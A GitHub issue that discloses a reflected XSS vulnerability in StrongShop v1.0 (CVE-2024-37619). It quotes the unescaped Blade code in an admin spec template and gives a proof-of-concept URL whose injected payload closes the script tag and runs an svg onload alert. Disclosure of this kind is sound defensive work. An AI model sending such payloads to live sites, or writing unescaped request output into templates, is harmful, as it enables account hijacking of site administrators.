Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

StrongShop v1.0 has a reflected XSS vulnerability #45

Open
Hebing123 opened this issue May 30, 2024 · 1 comment
Open

StrongShop v1.0 has a reflected XSS vulnerability #45

Hebing123 opened this issue May 30, 2024 · 1 comment

Comments

@Hebing123
Copy link
Owner

Summary

StrongShop v1.0 has a Reflective Cross-Site Scripting (XSS) vulnerability located in the file resources/views/admin/product/spec/index.blade.php.

Details

The vulnerability is located in the script tag. The application does not escape the user-supplied spec_group_id parameter before including it in the HTML output, leading to a reflective XSS vulnerability.

var spec_group_id = '{!!request('spec_group_id')!!}';
    var tableConfig = {
        cols: [cols]
        ,where:{spec_group_id:spec_group_id}
    };
    Util.renderTable(tableConfig);
}();
</script>

Proof of Concept (PoC)

http://192.168.0.10:1019/admin/product/spec/index?spec_group_id='%3C/script%3E%3Csvg%20onload=alert(1)%3E%3Cscript%3E
image
@Hebing123
Copy link
Owner Author

CVE-2024-37619

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Hebing123